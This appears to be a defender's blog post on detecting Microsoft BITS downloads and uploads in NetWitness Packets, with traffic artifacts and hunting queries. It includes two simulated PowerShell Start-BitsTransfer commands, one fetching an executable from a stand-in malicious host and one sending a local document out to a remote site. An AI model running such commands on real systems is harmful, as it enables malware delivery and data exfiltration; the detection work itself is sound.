Part 1: NetWitness for Packets
I recently read an article from Microsoft (https://msdn.microsoft.com/en-us/library/windows/desktop/ee663885%28v=vs.85%29.aspx#to_create_a_synchronous_bits_transfer_job_with_multiple_files) describing how to use the Microsoft Background Intelligent Transfer Service (BITS) to perform file transfers. While not common, BITS has been used for downloading malware or uploading documents in past attacks. This got me wondering how I would identify this activity in NetWitness Packets.
There are two scenarios’ I tested:
- Powershell/BITS used to download files from remote server
- Powershell/BITS used to upload files from a local machine
Scenario 1: Powershell/BITS used to download from remote server
For this scenario, I am simulating a PowerShell command that is run on a machine local to an organization and attempts to download a malicious executable. Just to note, I have chosen to download a malicious executable to better illustrate the scenario, however, any file-type could be downloaded using this method. Below is the PowerShell command I used:
PS C:\Users\moss> Start-BitsTransfer -Source http://www.badsite.com/badfile.exe -Destination C:\Users\moss\temp.exe
Now if we were to examine this communication in NetWitness Packets we would see something similar to Figure 1. BITS will follow the HTTP protocol to retrieve the remote file. There are two important artifacts to notice, first is the use of the HEAD in the initial request. HEAD is similar to a GET, except it checks to see if the resource is present. The second artifact is the use of the 'Microsoft BITS/7.5' User Agent, this User-Agent is specific to BITS communication.
Figure 1: BITS HEAD Request
If BITS receives notification that the resource is available, it then initiates a GET request for the resource as shown in Figure 2.
Figure 2: BITS GET Request
If you would like to examine BITS downloads in your organization using NetWitness Packets, the below query/rule can help:
direction='outbound' && client contains 'Microsoft BITS'
Scenario 2: Powershell/BITS used to upload files from a local machine
This scenario isn't all that different then Scenario 1, as we are uploading a file to a remote site instead of downloading. The PowerShell command I used is below:
PS C:\Users\moss> Start-BitsTransfer -Source ‘C:\Users\Moss\badfiletoupload.docx’ -Destination
‘http://uploadwebsite.com' -TransferType upload
For inspection in NetWitness Packets, I expected to see a POST method instead of a HEAD/GET and that the same User-Agent, 'Microsoft/BITS7.5' would be used. And as you can see in Figure 3, this assumption is wrong, well sort of.
Figure 3: BITS_POST
BITS uses its own protocol on top of HTTP for data uploads identified by the ‘BITS_POST’ in the HTTP Header. Additional information on the BITS upload protocol is detailed here,
https://msdn.microsoft.com/en-us/library/windows/desktop/aa362828(v=vs.85).aspx. The general traffic flow between the client and server is as follows:
In NetWitness Packets, we can follow the Requests/Responses to see the protocol in action.
Figure 5: BITS POST Protocol in NetWitness Packets
Identifying BITS downloads and uploads may be useful additions to your hunting methodology and can be found using the below Rules/Query:
BITS Download: direction='outbound' && client contains 'Microsoft BITS'
BITS Upload: action='BITS_POST' && client contains 'Microsoft BITS'